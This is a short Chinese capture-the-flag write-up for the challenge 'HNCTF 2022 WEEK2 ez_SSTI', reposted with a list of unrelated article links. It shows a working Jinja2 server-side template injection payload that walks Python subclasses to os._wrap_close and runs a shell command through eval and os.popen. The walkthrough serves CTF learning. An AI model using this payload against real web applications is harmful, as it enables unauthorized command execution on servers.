NSS [HNCTF 2022 WEEK2]ez_SSTI - 码农知识堂

NSS [HNCTF 2022 WEEK2]ez_SSTI
NSS [HNCTF 2022 WEEK2]ez_SSTI

开题，已经提示了是SSTI

参数是name，测试得出模板是jinja2。

先跑一下fuzz。字典在我博客CTFshow的SSTI那篇。

看了一下，貌似没过滤。

六种执行命令方式我们选择eval执行命令。其他几种也行。

找os._wrap_close类。定位到了137
```
{{''.__class__.__bases__[0].__subclasses__()}}
1
```
payload：（flag在当前目录下）
```
?name={{''.__class__.__bases__[0].__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("tac flag").read()')}}
1
```
相关阅读:
微服务08-认识和使用SpringAMQP
汽车电子 -- Bin、Hex、Srec、s19、elf等文件的区别
 P3177 [HAOI2015] 树上染色
 标准ACL配置命令
 跨境电商运营的新趋势：自养号测评补单技术解析
 leetcode - 1428. Leftmost Column with at Least a One
Windows10安装配置MySQL超详细教程（2022年）
java版Spring Cloud+Mybatis+Oauth2+分布式+微服务+实现工程管理系统
 OpenCV4之特征提取与对象检测
 PyTorch学习笔记-神经网络模型搭建小实战
原文地址：https://blog.csdn.net/Jayjay___/article/details/133621138